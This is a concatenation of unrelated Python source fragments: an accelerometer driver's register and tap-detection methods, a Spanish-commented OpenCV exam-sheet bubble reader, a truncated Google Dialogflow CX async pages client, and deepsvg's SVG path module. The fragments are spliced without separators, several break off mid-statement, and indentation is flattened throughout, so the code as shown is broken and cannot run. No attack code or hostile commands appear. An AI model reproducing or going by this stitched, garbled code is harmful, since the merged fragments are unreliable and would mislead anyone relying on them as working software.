value1 = self.read_reg(self.REG_CTRL_REG4)
value2 = self.read_reg(self.REG_CTRL_REG5)
value3 = self.read_reg(self.REG_CTRL_REG7)
value3 = value3 & (~0x20)
value3 = value3 | 0x20
value1 = value1 | event
self.write_reg(self.REG_CTRL_REG4,value1)
self.write_reg(self.REG_CTRL_REG7,value3)
if event == self.FREEFALL:
self.__lock_interrupt(True)
'''
    @brief Set the wake-up duration. When using the eDetectAct detection mode of the setActMode() function, this is the period during which
    @n data is collected at the normal rate after the chip is awakened. The chip then goes back to hibernation, collecting data at 12.5 Hz.
@param dur duration, range: 0~3
@n time = dur * (1/rate)(unit:s)
| An example of a linear relationship between an argument and time |
|------------------------------------------------------------------------------------------------------------------------|
| | | | | |
    | Data rate |        25 Hz         |        100 Hz          |        400 Hz          |        800 Hz           |
|------------------------------------------------------------------------------------------------------------------------|
| time |dur*(1s/25)= dur*40ms| dur*(1s/100)= dur*10ms | dur*(1s/400)= dur*2.5ms | dur*(1s/800)= dur*1.25ms |
|------------------------------------------------------------------------------------------------------------------------|
'''
def set_wakeup_dur(self,dur):
value = self.read_reg(self.REG_WAKE_UP_DUR)
value = value & (~0x60)
value = value | ((dur << 5) & 0x60)
#print(value)
self.write_reg(self.REG_WAKE_UP_DUR,value)
'''
    @brief Set the motion-detection mode. The first mode does not detect whether the module is moving; the second, once set, measures
    @n data at a lower frequency to save power and returns to normal after motion is detected; the third can only detect whether the
    @n module is in a sleep state.
@param mode Motion detection mode
NO_DETECTION #No detection
DETECT_ACT #Detect movement,the chip automatically goes to 12.5 Hz rate in the low-power mode
DETECT_STATMOTION #Detect Motion, the chip detects acceleration below a fixed threshold but does not change either rate or operating mode
'''
def set_act_mode(self,mode):
value1 = self.read_reg(self.REG_WAKE_UP_THS)
value2 = self.read_reg(self.REG_WAKE_UP_DUR)
value1 = value1 & (~(1<<6))
value2 = value2 & (~(1<<4))
value1 = value1 | (mode & 0x01)<<6
value2 = value2 | ((mode & 0x02)>>1)<<4
#print(value1)
#print(value2)
self.write_reg(self.REG_WAKE_UP_THS,value1)
self.write_reg(self.REG_WAKE_UP_DUR,value2)
'''
    @brief Set the wake-up threshold: when the acceleration in a certain direction exceeds this value, a wake-up event is triggered
    @param th threshold, unit: mg; the value must be within the measurement range
'''
def set_wakeup_threshold(self,th):
th1 = (float(th)/self.__range_d) * 64
value = self.read_reg(self.REG_WAKE_UP_THS)
value = value &(~0x3f)
value = value | (int(th1) & 0x3f)
#print(value)
self.write_reg(self.REG_WAKE_UP_THS,value)
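    # Worked example (assuming __range_d is the full-scale range in the same units
    # as th): with a +/-2 g range and th at half of full scale, th1 = (th/range)*64
    # = 32, so 0x20 is written into the 6-bit (0x3f) threshold field.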
'''
    @brief Lock interrupt. Switches between latched ('1'-logic) and pulsed ('0'-logic) mode for
@n function source signals and interrupts routed to pins (wakeup, single/double-tap).
@param enable true lock interrupt.
false pulsed interrupt
'''
def __lock_interrupt(self,enable):
value = self.read_reg(self.REG_CTRL_REG3)
value = value & (~0x10)
value = value | (enable << 4)
self.write_reg(self.REG_CTRL_REG3,value)
'''
@brief Set to detect tap events in the Z direction
    @param enable True(Enable tap detection)\False(Disable tap detection)
'''
def enable_tap_detection_on_z(self, enable):
value = self.read_reg(self.REG_TAP_THS_Z)
value = value & (~(1<<5))
value = value | (enable << 5)
#print("enable_tap_detection_on_z")
#print(value)
self.write_reg(self.REG_TAP_THS_Z,value)
'''
@brief Set to detect tap events in the Y direction
    @param enable True(Enable tap detection)\False(Disable tap detection)
'''
def enable_tap_detection_on_y(self, enable):
value = self.read_reg(self.REG_TAP_THS_Z)
value = value & (~(1<<6))
value = value | (enable << 6)
#print("enable_tap_detection_on_y")
#print(value)
self.write_reg(self.REG_TAP_THS_Z,value)
'''
@brief Set to detect tap events in the X direction
    @param enable True(Enable tap detection)\False(Disable tap detection)
'''
def enable_tap_detection_on_x(self, enable):
value = self.read_reg(self.REG_TAP_THS_Z)
value = value & (~(1<<7))
value = value | (enable << 7)
#print("enable_tap_detection_on_x")
#print(value)
self.write_reg(self.REG_TAP_THS_Z,value)
'''
@brief Set the tap threshold in the X direction
@param th Threshold(g),Can only be used in the range of ±2g
'''
def set_tap_threshold_on_x(self,th):
th1 = (float(th)/self.__range_d) * 32
value = self.read_reg(self.REG_TAP_THS_X)
value = value & (~0x1f)
value = value | (int(th1) & 0x1f)
#print("set_tap_threshold_on_x")
#print(value)
self.write_reg(self.REG_TAP_THS_X,value)
'''
@brief Set the tap threshold in the Y direction
@param th Threshold(g),Can only be used in the range of ±2g
'''
def set_tap_threshold_on_y(self,th):
th1 = (float(th)/self.__range_d) * 32
value = self.read_reg(self.REG_TAP_THS_Y)
value = value & (~0x1f)
value = value | (int(th1) & 0x1f)
#print("set_tap_threshold_on_y")
#print(value)
self.write_reg(self.REG_TAP_THS_Y,value)
'''
@brief Set the tap threshold in the Z direction
@param th Threshold(g),Can only be used in the range of ±2g
'''
def set_tap_threshold_on_z(self,th):
th1 = (float(th)/self.__range_d) * 32
value = self.read_reg(self.REG_TAP_THS_Z)
value = value & (~0x1f)
value = value | (int(th1) & 0x1f)
#print("set_tap_threshold_on_z")
#print(value)
self.write_reg(self.REG_TAP_THS_Z,value)
'''
@brief Duration of maximum time gap for double-tap recognition. When double-tap
@n recognition is enabled, this register expresses the maximum time between two
@n successive detected taps to determine a double-tap event.
@param dur duration,range: 0~15
@n time = dur * (1/rate)(unit:s)
| An example of a linear relationship between an argument and time |
|------------------------------------------------------------------------------------------------------------------------|
| | | | | |
    | Data rate |        25 Hz         |        100 Hz          |        400 Hz          |        800 Hz           |
# ...from
# a plan-view (top-down) perspective. The area of the contour that
# surrounds it is also returned
def detectar_examen(imagen):
    #imagen -- photo of the exam, read with imread-opencv
    #Functions taken from the openCV repository to detect squares in
    # the image
def angle_cos(p0, p1, p2):
d1, d2 = (p0-p1).astype('float'), (p2-p1).astype('float')
return abs( np.dot(d1, d2) / np.sqrt( np.dot(d1, d1)*np.dot(d2, d2) ) )
def find_boxes(img):
img = cv2.GaussianBlur(img, (5, 5), 0)
squares = []
for gray in cv2.split(img):
for thrs in xrange(0, 255, 26):
if thrs == 0:
bin = cv2.Canny(gray, 0, 50, apertureSize=5)
bin = cv2.dilate(bin, None)
else:
_retval, bin = cv2.threshold(gray, thrs, 255, cv2.THRESH_BINARY)
cntours, _hierarchy = cv2.findContours(bin, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for cnt in cntours:
cnt_len = cv2.arcLength(cnt, True)
cnt = cv2.approxPolyDP(cnt, 0.02*cnt_len, True)
                    #This comparison is different from the one used by
                    # the
if len(cnt) == 4 and cv2.contourArea(cnt) > 1000 and cv2.isContourConvex(cnt):
cnt = cnt.reshape(-1, 2)
max_cos = np.max([angle_cos( cnt[i], cnt[(i+1) % 4], cnt[(i+2) % 4] ) for i in xrange(4)])
if max_cos < 0.1:
squares.append(cnt)
return squares
    #Resize the image for faster and more efficient processing
examen = imutils.resize(imagen, width=700)
    #Find the boxes in the image, convert them to a numpy array
    # and finally sort them by the area they occupy, largest first
recuadros = find_boxes(examen)
recuadros = np.array(recuadros)
recuadros = sorted(recuadros, key=cv2.contourArea, reverse=True)
    #Convert the image to grayscale
examensub = cv2.cvtColor(examen, cv2.COLOR_BGR2GRAY)
    #Apply thresholding to the image to try to leave the page
    # white, clearly distinguished from the surrounding background
examensub = cv2.threshold(examensub, 250, 255,
cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]
    #Initialize the variable that stores the index of the box corresponding
    # to the exam only (the one that contains the page)
indice_vp = 0
    #Loop over all of the contours obtained (so that every one
    # of them is covered by the analysis)
for i in range(len(recuadros)):
        #Extract the contours and use the imutils function to
        # obtain the image seen from a plan (top-down) view
examen_vp = four_point_transform(examensub, recuadros[i].reshape(4,2))
        #Store the height and width of the image
height, width = examen_vp.shape[:2]
        #Initialize the variables that accumulate the values of the pixels
        # to be analyzed
pixel_xi = 0
pixel_xd = 0
pixel_ya = 0
pixel_yb = 0
        #Walk along the height and sum all the pixels in x into the
        # corresponding variable (the analysis point is placed 5 pixels to the
        # right of the origin and 5 before the full width for a better analysis).
        # The pixels can only take the values 0 and 1, so they add up as we go
for p in range(height):
pixel_xi = pixel_xi + examen_vp[p, 5]
pixel_xd = pixel_xd + examen_vp[p, width-5]
        #Repeat the above, but across the width of the image, always leaving
        # the corresponding margin
for p in range(width):
pixel_ya = pixel_ya + examen_vp[5, p]
pixel_yb = pixel_yb + examen_vp[height-5, p]
        #For the image to be the exam, the analyzed pixels must sum to 0,
        # since they would all be white as part of the sheet of that color,
        # and with the thresholding they stayed that way, distinct from the
        # background, which was turned black. If all the pixels in the analyzed
        # margin, both along the height and the width, sum to 0, the index is
        # saved because it is the exam's
if pixel_xi == 0 and pixel_xd == 0 and pixel_ya == 0 and pixel_yb == 0:
indice_vp = i
break
    #With the index found, the area of the corresponding contour is extracted,
    # and the exam cropped with that contour is also obtained, seen from a plan view
area = cv2.contourArea(recuadros[indice_vp])
examen = four_point_transform(examen, recuadros[indice_vp].reshape(4,2))
    #Return the extracted exam image and the obtained area
return examen, area
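# Usage sketch (hypothetical file name; relies on the cv2/imutils imports at the top
# of this file):
#   foto = cv2.imread("examen.jpg")
#   examen, area = detectar_examen(foto)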
#Returns the lower box of the exam layout after detecting it, along with
# its area. The functions from squares.py are used, but with a
# modification that limits the areas to detect (they must be smaller
# than the area of the detected exam)
def detectar_cinfo(examen, areac):
    #examen -- exam image with the plan-view perspective applied
    #areac -- area of the contour that surrounds the exam only
def angle_cos(p0, p1, p2):
d1, d2 = (p0-p1).astype('float'), (p2-p1).astype('float')
return abs( np.dot(d1, d2) / np.sqrt( np.dot(d1, d1)*np.dot(d2, d2) ) )
def find_boxes(img):
img = cv2.GaussianBlur(img, (5, 5), 0)
squares = []
for gray in cv2.split(img):
for thrs in xrange(0, 255, 26):
if thrs == 0:
bin = cv2.Canny(gray, 0, 50, apertureSize=5)
bin = cv2.dilate(bin, None)
else:
_retval, bin = cv2.threshold(gray, thrs, 255, cv2.THRESH_BINARY)
cntours, _hierarchy = cv2.findContours(bin, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for cnt in cntours:
cnt_len = cv2.arcLength(cnt, True)
cnt = cv2.approxPolyDP(cnt, 0.02*cnt_len, True)
                    #Boxes are detected only if they are smaller than the area
                    # of the exam contour and larger than a minimum
if len(cnt) == 4 and cv2.contourArea(cnt) > 1000 and cv2.contourArea(cnt) < areac and cv2.isContourConvex(cnt):
cnt = cnt.reshape(-1, 2)
max_cos = np.max([angle_cos( cnt[i], cnt[(i+1) % 4], cnt[(i+2) % 4] ) for i in xrange(4)])
if max_cos < 0.1:
squares.append(cnt)
return squares
    #Apply the function to find the boxes inside the exam and
    # convert them to a numpy array
recuadros = find_boxes(examen)
recuadros = np.array(recuadros)
    #Sort the detected boxes in ascending order (the smallest one
    # first)
recuadros = sorted(recuadros, key=cv2.contourArea, reverse=False)
    #According to the layout used, the smallest one under the detection
    # criteria should be the lower box containing the sheet number
area = cv2.contourArea(recuadros[0])
    #Return the sorted list of boxes and the area of the first
    # box (the one that matters)
return recuadros, area
def leer_respuestas(exam_vistaplanta):
    # exam_vistaplanta --> image seen from the plan-view perspective
    #Initialize the list that will store the contours to be passed to the
    # correct/incorrect comparison
contornos_comparar = []
    #Initialize a list that stores the contours to be drawn inside
    # this function
contorno_dibujar = []
    #Initialize the numpy array that stores the answers read from the exam
respuestasGuardadas = np.zeros((40,1))
    #Convert the plan view to grayscale
exam_vistaplantaGris = cv2.cvtColor(exam_vistaplanta, cv2.COLOR_BGR2GRAY)
    #Apply thresholding to the grayscale exam and keep only the
    #image
exam_umbralizado = cv2.threshold(exam_vistaplantaGris, 0, 255,
cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]
    #Extract the contours found in the thresholded exam, but
    # only the outermost ones inside the box
contornos = cv2.findContours(exam_umbralizado.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
    #Extract only the array with the contours
contornos = imutils.grab_contours(contornos)
    #Initialize the parameters used to identify the
    # contours that will be considered bubbles
caja_longitud = 12
caja_relacion = 0.01
    #Initialize the array that will store the bubble contours
contornos_preguntas = []
    #Obtain the bubble contours using the corresponding
    # function defined above
contornos_preguntas = encontrar_opciones(contornos, caja_longitud, caja_relacion, contornos_preguntas)
    #Check whether there are 160 bubbles (the number of options and
    # questions is fixed and known); while this is not the case, the
    # parameter values must be adjusted to widen or narrow the range
    # that identifies contours as bubbles
while len(contornos_preguntas) != 160:
        #Determine whether there are fewer bubbles than there should be
if len(contornos_preguntas) < 160:
            #By trial and error it was found that this is due to the aspect
            # ratio, so the allowed range is widened
caja_relacion += 0.05
            #Empty the list, since the new contours will be found
contornos_preguntas = []
contornos_preguntas = encontrar_opciones(contornos, caja_longitud, caja_relacion, contornos_preguntas)
            #Determine whether there are more bubbles than
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Sequence, Tuple, Type, Union
import pkg_resources
import google.api_core.client_options as ClientOptions # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.dialogflowcx_v3beta1.services.pages import pagers
from google.cloud.dialogflowcx_v3beta1.types import fulfillment
from google.cloud.dialogflowcx_v3beta1.types import page
from google.cloud.dialogflowcx_v3beta1.types import page as gcdc_page
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import PagesTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import PagesGrpcAsyncIOTransport
from .client import PagesClient
class PagesAsyncClient:
"""Service for managing
[Pages][google.cloud.dialogflow.cx.v3beta1.Page].
"""
_client: PagesClient
DEFAULT_ENDPOINT = PagesClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = PagesClient.DEFAULT_MTLS_ENDPOINT
entity_type_path = staticmethod(PagesClient.entity_type_path)
parse_entity_type_path = staticmethod(PagesClient.parse_entity_type_path)
flow_path = staticmethod(PagesClient.flow_path)
parse_flow_path = staticmethod(PagesClient.parse_flow_path)
intent_path = staticmethod(PagesClient.intent_path)
parse_intent_path = staticmethod(PagesClient.parse_intent_path)
page_path = staticmethod(PagesClient.page_path)
parse_page_path = staticmethod(PagesClient.parse_page_path)
transition_route_group_path = staticmethod(PagesClient.transition_route_group_path)
parse_transition_route_group_path = staticmethod(PagesClient.parse_transition_route_group_path)
webhook_path = staticmethod(PagesClient.webhook_path)
parse_webhook_path = staticmethod(PagesClient.parse_webhook_path)
common_billing_account_path = staticmethod(PagesClient.common_billing_account_path)
parse_common_billing_account_path = staticmethod(PagesClient.parse_common_billing_account_path)
common_folder_path = staticmethod(PagesClient.common_folder_path)
parse_common_folder_path = staticmethod(PagesClient.parse_common_folder_path)
common_organization_path = staticmethod(PagesClient.common_organization_path)
parse_common_organization_path = staticmethod(PagesClient.parse_common_organization_path)
common_project_path = staticmethod(PagesClient.common_project_path)
parse_common_project_path = staticmethod(PagesClient.parse_common_project_path)
common_location_path = staticmethod(PagesClient.common_location_path)
parse_common_location_path = staticmethod(PagesClient.parse_common_location_path)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
PagesAsyncClient: The constructed client.
"""
return PagesClient.from_service_account_info.__func__(PagesAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
PagesAsyncClient: The constructed client.
"""
return PagesClient.from_service_account_file.__func__(PagesAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@property
def transport(self) -> PagesTransport:
"""Returns the transport used by the client instance.
Returns:
PagesTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(type(PagesClient).get_transport_class, type(PagesClient))
def __init__(self, *,
credentials: ga_credentials.Credentials = None,
transport: Union[str, PagesTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the pages client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.PagesTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = PagesClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def list_pages(self,
request: page.ListPagesRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListPagesAsyncPager:
r"""Returns the list of all pages in the specified flow.
Args:
request (:class:`google.cloud.dialogflowcx_v3beta1.types.ListPagesRequest`):
The request object. The request message for
[Pages.ListPages][google.cloud.dialogflow.cx.v3beta1.Pages.ListPages].
parent (:class:`str`):
Required. The flow to list all pages for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.services.pages.pagers.ListPagesAsyncPager:
The response message for
[Pages.ListPages][google.cloud.dialogflow.cx.v3beta1.Pages.ListPages].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = page.ListPagesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_pages,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("parent", request.parent),
)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListPagesAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
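    # Usage sketch (hypothetical project/agent/flow IDs, not part of this module):
    #   client = PagesAsyncClient()
    #   parent = "projects/my-project/locations/global/agents/my-agent/flows/my-flow"
    #   pager = await client.list_pages(parent=parent)
    #   async for pg in pager:
    #       print(pg.display_name)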
async def get_page(self,
request: page.GetPageRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> page.Page:
r"""Retrieves the specified page.
Args:
request (:class:`google.cloud.dialogflowcx_v3beta1.types.GetPageRequest`):
The request object. The request message for
[Pages.GetPage][google.cloud.dialogflow.cx.v3beta1.Pages.GetPage].
name (:class:`str`):
Required. The name of the page. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>/pages/<Page ID>``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.Page:
A Dialogflow CX conversation (session) can be described and visualized as a
state machine. The states of a CX session are
represented by pages.
For each flow, you define many pages, where your
combined pages can handle a complete conversation on
the topics the flow is designed for. At any given
moment, exactly one page is the current page, the
current page is considered active, and the flow
associated with that page is considered active. Every
flow has a special start page. When a flow initially
                becomes active, the start page becomes the
current page. For each conversational turn, the
current page will either stay the same or transition
to another page.
You configure each page to collect information from
the end-user that is relevant for the conversational
state represented by the page.
For more information, see the [Page
guide](\ https://cloud.google.com/dialogflow/cx/docs/concept/page).
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError("If the `request` argument is set, then none of "
"the individual field arguments should be set.")
request = page.GetPageRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not | |
# deepsvg/svglib/svg_path.py
from __future__ import annotations
from .geom import *
import deepsvg.svglib.geom as geom
import re
import torch
from typing import List, Union
from xml.dom import minidom
import math
import shapely.geometry
import numpy as np
from .geom import union_bbox
from .svg_command import SVGCommand, SVGCommandMove, SVGCommandClose, SVGCommandBezier, SVGCommandLine, SVGCommandArc
COMMANDS = "MmZzLlHhVvCcSsQqTtAa"
COMMAND_RE = re.compile(r"([MmZzLlHhVvCcSsQqTtAa])")
FLOAT_RE = re.compile(r"[-+]?[0-9]*\.?[0-9]+(?:[eE][-+]?[0-9]+)?")
empty_command = SVGCommandMove(Point(0.))
class Orientation:
COUNTER_CLOCKWISE = 0
CLOCKWISE = 1
class SVGPath:
def __init__(self, path_commands: List[SVGCommand] = None, origin: Point = None,
closed=False, fill=False, stroke=(0,0,0), dasharray=False, stroke_width=1):
self.origin = origin or Point(0.)
self.path_commands = path_commands
self.closed = closed
self.fill = fill
self.stroke = stroke
self.dasharray = dasharray
self.stroke_width = stroke_width
@property
def start_command(self):
return SVGCommandMove(self.origin, self.start_pos)
@property
def start_pos(self):
return self.path_commands[0].start_pos
@property
def end_pos(self):
return self.path_commands[-1].end_pos
def to_group(self, *args, **kwargs):
from .svg_primitive import SVGPathGroup
return SVGPathGroup([self], *args, **kwargs)
def set_filling(self, filling=True):
# self.filling = Filling.FILL if filling else Filling.ERASE
return self
def __len__(self):
return 1 + len(self.path_commands)
def __getitem__(self, idx):
if idx == 0:
return self.start_command
return self.path_commands[idx-1]
def all_commands(self, with_close=True):
close_cmd = [SVGCommandClose(self.path_commands[-1].end_pos.copy(), self.start_pos.copy())] if self.closed and self.path_commands and with_close \
else ()
return [self.start_command, *self.path_commands, *close_cmd]
def copy(self):
return SVGPath(
[path_command.copy() for path_command in self.path_commands],
self.origin.copy(), self.closed,
fill=self.fill, stroke=self.stroke,
dasharray=self.dasharray, stroke_width=self.stroke_width
)
@staticmethod
def _tokenize_path(path_str):
cmd = None
for x in COMMAND_RE.split(path_str):
if x and x in COMMANDS:
cmd = x
elif cmd is not None:
yield cmd, list(map(float, FLOAT_RE.findall(x)))
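    # Tokenization sketch: _tokenize_path splits a path string into (command, args)
    # pairs, e.g. "M0 0 L10 10 Z" yields ('M', [0.0, 0.0]), ('L', [10.0, 10.0]), ('Z', []).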
    @staticmethod
    def parse_color(col: str):
if col.startswith("#"):
h = col.lstrip('#')
rgb = tuple((int(h[i:i+2], 16))/255.0 for i in (0, 2, 4))
return rgb
return False
    @staticmethod
    def color_tohex(color):
if color == False:
return "none"
else:
r,g,b = color
return '#%02x%02x%02x' % (int(r*255.0), int(g*255.0), int(b*255.0))
@staticmethod
def from_xml(x: minidom.Element):
# fill = not x.hasAttribute("fill") or not x.getAttribute("fill") == "none"
# filling = Filling.OUTLINE if not x.hasAttribute("filling") else int(x.getAttribute("filling"))
fill = SVGPath.parse_color(x.getAttribute("fill"))
stroke = SVGPath.parse_color(x.getAttribute('stroke'))
dasharray = x.getAttribute('dasharray')
stroke_width = x.getAttribute('stroke-width')
s = x.getAttribute('d')
return SVGPath.from_str(s, fill=fill, stroke=stroke, dasharray=dasharray, stroke_width=stroke_width)
@staticmethod
def from_str(s: str, fill=False, stroke=(0,0,0), dasharray=False, stroke_width=1, add_closing=False):
path_commands = []
pos = initial_pos = Point(0.)
prev_command = None
for cmd, args in SVGPath._tokenize_path(s):
cmd_parsed, pos, initial_pos = SVGCommand.from_str(cmd, args, pos, initial_pos, prev_command)
prev_command = cmd_parsed[-1]
path_commands.extend(cmd_parsed)
return SVGPath.from_commands(path_commands, fill=fill, stroke=stroke, dasharray=dasharray,
stroke_width=stroke_width, add_closing=add_closing)
@staticmethod
def from_tensor(tensor: torch.Tensor, allow_empty=False):
return SVGPath.from_commands([SVGCommand.from_tensor(row) for row in tensor], allow_empty=allow_empty)
@staticmethod
def from_commands(path_commands: List[SVGCommand], fill=False, stroke=(0,0,0),
dasharray=False, stroke_width=1, add_closing=False, allow_empty=False):
from .svg_primitive import SVGPathGroup
if not path_commands:
return SVGPathGroup([])
svg_paths = []
svg_path = None
for command in path_commands:
if isinstance(command, SVGCommandMove):
if svg_path is not None and (allow_empty or svg_path.path_commands): # SVGPath contains at least one command
if add_closing:
svg_path.closed = True
if not svg_path.path_commands:
svg_path.path_commands.append(empty_command)
svg_paths.append(svg_path)
svg_path = SVGPath([], command.start_pos.copy(), fill=fill, stroke=stroke, dasharray=dasharray, stroke_width=stroke_width)
else:
if svg_path is None:
# Ignore commands until the first moveTo command
continue
if isinstance(command, SVGCommandClose):
if allow_empty or svg_path.path_commands: # SVGPath contains at least one command
svg_path.closed = True
if not svg_path.path_commands:
svg_path.path_commands.append(empty_command)
svg_paths.append(svg_path)
svg_path = None
else:
svg_path.path_commands.append(command)
if svg_path is not None and (allow_empty or svg_path.path_commands): # SVGPath contains at least one command
if add_closing:
svg_path.closed = True
if not svg_path.path_commands:
svg_path.path_commands.append(empty_command)
svg_paths.append(svg_path)
return SVGPathGroup(svg_paths, fill=fill, stroke=stroke, dasharray=dasharray, stroke_width=stroke_width)
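# Note (added for clarity): from_commands splits a flat command list into sub-paths.
# A Move command starts a new SVGPath, a Close command marks the current one as closed,
# and any command seen before the first Move is ignored. For example, the sequence
# Move, Line, Line, Close, Move, Bezier produces an SVGPathGroup with two SVGPaths,
# the first of which is closed.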
def __repr__(self):
return "SVGPath(stroke:{}, fill:{}, {})".format(
self.stroke, self.fill, " ".join(command.__repr__() for command in self.all_commands()))
def to_str(self, fill=False):
return " ".join(command.to_str() for command in self.all_commands())
def to_tensor(self, PAD_VAL=-1):
return torch.stack([command.to_tensor(PAD_VAL=PAD_VAL) for command in self.all_commands()])
def _get_viz_elements(self, with_points=False, with_handles=False, with_bboxes=False, color_firstlast=False, with_moves=True):
points = self._get_points_viz(color_firstlast, with_moves) if with_points else ()
handles = self._get_handles_viz() if with_handles else ()
return [*points, *handles]
def draw(self, viewbox=Bbox(24), *args, **kwargs):
from .svg import SVG
return SVG([self.to_group()], viewbox=viewbox).draw(*args, **kwargs)
def _get_points_viz(self, color_firstlast=True, with_moves=True):
points = []
commands = self.all_commands(with_close=False)
n = len(commands)
for i, command in enumerate(commands):
if not isinstance(command, SVGCommandMove) or with_moves:
points_viz = command.get_points_viz(first=(color_firstlast and i <= 1), last=(color_firstlast and i >= n-2))
points.extend(points_viz)
return points
def _get_handles_viz(self):
handles = []
for command in self.path_commands:
handles.extend(command.get_handles_viz())
return handles
def _get_unique_geoms(self):
geoms = []
for command in self.all_commands():
geoms.extend(command.get_geoms())
return list(set(geoms))
def translate(self, vec):
for geom in self._get_unique_geoms():
geom.translate(vec)
return self
def rotate(self, angle):
for geom in self._get_unique_geoms():
geom.rotate_(angle)
return self
def scale(self, factor):
for geom in self._get_unique_geoms():
geom.scale(factor)
return self
def filter_consecutives(self):
path_commands = []
for command in self.path_commands:
if not command.start_pos.isclose(command.end_pos):
path_commands.append(command)
self.path_commands = path_commands
return self
def filter_duplicates(self, min_dist=0.2):
path_commands = []
current_command = None
for command in self.path_commands:
if current_command is None:
path_commands.append(command)
current_command = command
continue
if command.end_pos.dist(current_command.end_pos) >= min_dist:
command.start_pos = current_command.end_pos
path_commands.append(command)
current_command = command
self.path_commands = path_commands
return self
def duplicate_extremities(self):
self.path_commands = [SVGCommandLine(self.start_pos, self.start_pos),
*self.path_commands,
SVGCommandLine(self.end_pos, self.end_pos)]
return self
def is_clockwise(self):
if len(self.path_commands) == 1:
cmd = self.path_commands[0]
